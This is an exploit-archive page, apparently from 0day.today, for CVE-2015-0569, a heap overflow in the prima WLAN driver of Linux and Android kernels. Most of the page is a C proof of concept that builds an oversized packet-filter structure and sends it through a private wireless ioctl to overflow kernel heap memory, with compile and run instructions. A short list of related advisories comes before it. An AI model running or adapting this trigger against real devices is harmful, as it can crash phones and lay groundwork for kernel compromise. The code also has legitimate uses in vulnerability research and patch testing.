Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow

🗓️ 25 Jan 2016 00:00:00Reported by Shawn the R0ckType

zdt🔗 0day.today👁 155 Views

Linux Kernel WLAN Driver Heap Overflow IoT Vulnerabilit

Reporter	Title	Published	Views	Family All 155
Gitee	Exploit for Out-of-bounds Write in Linux Linux_Kernel	13 Sep 202521:03	–	gitee
android	CVE-2015-0569	1 May 201600:00	–	android
CNVD	Linux kernel WLAN Driver Component Buffer Overflow Vulnerability	22 Apr 201600:00	–	cnvd
CVE	CVE-2015-0569	9 May 201610:00	–	cve
Cvelist	CVE-2015-0569	9 May 201610:00	–	cvelist
Tenable Nessus	EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1484)	13 May 201900:00	–	nessus
EUVD	EUVD-2015-0582	7 Oct 202500:30	–	euvd
GoogleProjectZero	In-the-Wild Series: Android Exploits	12 Jan 202100:00	–	googleprojectzero
Huawei	Security Advisory - Memory Overflow Vulnerability in the Huawei Smartphone	24 Nov 201500:00	–	huawei
NVD	CVE-2015-0569	9 May 201610:59	–	nvd

/*
 * Coder: Shawn the R0ck, [[email protected]]
 * Co-worker: Pray3r, [[email protected]]
 * Compile:
 * # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT  -pie 
 * # ./a.out wlan0
 * Boom......shit happens[ as always];-)
*/
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/wireless.h>
#include <errno.h>
 
typedef unsigned char v_U8_t;
#define HDD_MAX_CMP_PER_PACKET_FILTER     5
 
struct PacketFilterParamsCfg {
    v_U8_t protocolLayer;
    v_U8_t cmpFlag;
    v_U8_t dataOffset;
    v_U8_t dataLength;
    v_U8_t compareData[8];
    v_U8_t dataMask[8];
};
 
typedef struct {
    v_U8_t filterAction;
    v_U8_t filterId;
    v_U8_t numParams;
    struct PacketFilterParamsCfg
        paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];
} tPacketFilterCfg, *tpPacketFilterCfg;
 
int main(int argc, const char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "Bad usage\n");
        fprintf(stderr, "Usage: %s ifname\n", argv[0]);
        return -1;
    }
 
    struct iwreq req;
    strcpy(req.ifr_ifrn.ifrn_name, argv[1]);
    int fd, status, i = 0;
    fd = socket(AF_INET, SOCK_DGRAM, 0);
    tPacketFilterCfg p_req;
 
    /* crafting a data structure to triggering the code path */
    req.u.data.pointer =
        malloc(sizeof(v_U8_t) * 3 +
           sizeof(struct PacketFilterParamsCfg) * 5);
    p_req.filterAction = 1;
    p_req.filterId = 0;
    p_req.numParams = 3;
    for (; i < 5; i++) {
        p_req.paramsData[i].dataLength = 241;
        memset(&p_req.paramsData[i].compareData, 0x41, 16);
    }
 
    memcpy(req.u.data.pointer, &p_req,
           sizeof(v_U8_t) * 3 +
           sizeof(struct PacketFilterParamsCfg) * 5);
 
    if (ioctl(fd, 0x8bf7, &req) == -1) {
        fprintf(stderr, "Failed ioct() get on interface %s: %s\n",
            argv[1], strerror(errno));
    } else {
        printf("You shouldn't see this msg...\n");
    }
 
}

#  0day.today [2018-01-02]  #

25 Jan 2016 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.00446